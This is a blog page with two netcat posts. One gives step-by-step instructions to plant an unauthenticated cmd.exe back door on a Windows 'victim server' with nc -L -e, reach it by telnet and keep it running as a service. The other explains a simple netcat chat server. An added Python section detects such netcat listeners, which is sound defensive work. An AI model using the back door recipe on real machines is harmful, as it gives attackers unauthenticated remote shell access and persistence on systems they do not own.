15 Jan

Back Door

Image by destinelee

Netcat is often referred to as the TCP/IP Swiss Army knife. It can be used for good things as well as bad. By using Netcat we can create a back door to any Windows machine with ease.

  1. Download the Windows version of Netcat.
  2. Unzip nc.exe to the %SYSTEMROOT%\system32 directory.
  3. Execute nc -d -L -e cmd.exe -p 10001. Change 10001 to whichever port you wish.
  4. From any remote machine that can reach the victim server, you can now telnet to the server on port 10001 without any authentication: telnet X.X.X.X 10001

NOTE: As soon as you disconnect, netcat will stop running. You might look into running it as a service.
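
A defender's view of step 3, as an added example (not code from the original post): a Python check that flags process command lines where a netcat binary both listens (-l or -L) and hands each connection a program (-e), which is what separates the back door above from a plain netcat listener. The binary-name list, host names and sample records are constructed assumptions.

```python
import re
import shlex

# Assumed binary names for netcat builds; extend for renamed copies you know of.
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}

def analyze(cmdline):
    """Return a finding for a netcat listener that serves a program (-l/-L plus -e), else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:                            # unbalanced quotes in the logged field
        return None
    exe = re.split(r"[\\/]", argv[0].strip('"'))[-1].lower() if argv else ""
    if exe not in NETCAT_NAMES:
        return None
    listen, values, i = False, {}, 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-"):
            # Flags may be clustered ("-Ldp 10001"), so walk them one by one.
            for pos, flag in enumerate(arg[1:], start=1):
                if flag in "lL":
                    listen = True
                elif flag in "ep":                # flags whose value we record
                    value = arg[pos + 1:]         # "-p10001" form
                    if not value and i + 1 < len(argv):
                        i += 1                    # "-p 10001" form
                        value = argv[i]
                    values[flag] = value
                    break
        i += 1
    if listen and values.get("e"):
        return {"exe": exe, "program": values["e"], "port": values.get("p")}
    return None

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS-01", r"nc -d -L -e cmd.exe -p 10001"),
    ("WS-02", r'"C:\Windows\System32\nc.exe" -Ldp 10001 -e cmd.exe'),
    ("SRV-1", r"nc -n -v -l -p 10001"),          # listener with no -e: not flagged
    ("SRV-2", r"nc -n -v 192.168.10.1 10001"),   # outbound client: not flagged
]

def scan(events):
    return [(host, f) for host, cmd in events if (f := analyze(cmd))]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

The name check misses renamed binaries, so treat it as one signal alongside an inventory of listening ports.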

Have any more Netcat tips? Please share in the comments.

01 Dec

Netcat Chat Server

Ever use MSN instant messenger or Google Talk and feel like you are being watched? Well I have a little secret for you; you are being watched. Not that there is anything to hide, but privacy is always a good thing.

By using netcat we can set up a simple chat server, and it only takes about 5 minutes.

First, you need to make sure that you have netcat installed. Netcat is most likely included in your repositories if you are running Linux. Windows users can get the netcat Windows binary.

Ubuntu or Debian based systems:

sudo apt-get install netcat

Make sure you open the port on your local firewall if need be and the rest is very simple. Let's assume that the server's IP address is 192.168.10.1.

Run the netcat chat server on the server itself, listening on port 10001:

nc -n -v -l -p 10001

-n tells netcat not to do DNS lookups. Use this if you are using IPs only. It takes a long time for DNS to time out. If you are using hostnames, leave this switch off.
-v tells netcat to be verbose. This will allow you to see the chat messages in the terminal on the server.
-l tells netcat to listen for incoming connections on the local machine. This will allow other nodes to connect to your chat server.
-p 10001 tells netcat what port to listen on. Again, make sure that you open the port on your firewall. This can be anything, but make it obscure and not a standard port.

Now let's say Bob wants to chat with you on your new netcat chat server. It is very easy for him to connect and talk with you.

nc -n -v 192.168.10.1 10001

Keep in mind that this is not secure. Anyone sniffing packets can intercept your messages. I am also unaware of any other security holes this might bring. If there is considerable knowledge of the network, I would assume it would be safe.

There are many ways we could add to this. We could use OpenSSL and have a secure chat. Also, we could log all chat messages to a file by redirecting the output of the netcat chat server ( >> chatlog.txt). There are many other possibilities, including setting this up as a daemon with an init.d script. If you have any netcat tips or ways to implement this with OpenSSL, I would love to hear them in the comments.
